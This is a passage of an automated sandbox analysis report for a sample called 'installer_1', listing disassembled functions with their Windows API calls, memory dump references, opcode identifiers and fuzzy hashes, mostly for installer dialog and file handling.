                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocFree
                                                                                                          • String ID:
                                                                                                          • API String ID: 3394109436-0
                                                                                                          • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                          • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                                          • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                          • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                                          APIs
                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                          • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                                          • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                          • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesCreate
                                                                                                          • String ID:
                                                                                                          • API String ID: 415043291-0
                                                                                                          • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                          • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                          • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                          • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 3188754299-0
                                                                                                          • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                          • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                                          • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                          • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                                          APIs
                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 2738559852-0
                                                                                                          • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                          • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                                          • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                          • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                          • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                                          • String ID:
                                                                                                          • API String ID: 4115351271-0
                                                                                                          • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                          • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                                          • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                          • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                          • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                                                          • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                          • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                                                          APIs
                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 973152223-0
                                                                                                          • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                          • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                                          • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                          • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                          • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                                                          • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                          • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                                                          APIs
                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 2492992576-0
                                                                                                          • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                          • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                                          • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                          • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                          • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                          • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                          • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                          • String ID: $ @$M$N
                                                                                                          • API String ID: 1638840714-3479655940
                                                                                                          • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                          • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                          • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                          • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                          • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                          • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                                          • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                            • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                            • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                          • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                          • String ID: 82D$@%F$@rD$A
                                                                                                          • API String ID: 3347642858-1086125096
                                                                                                          • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                          • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                          • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                          • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                          • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
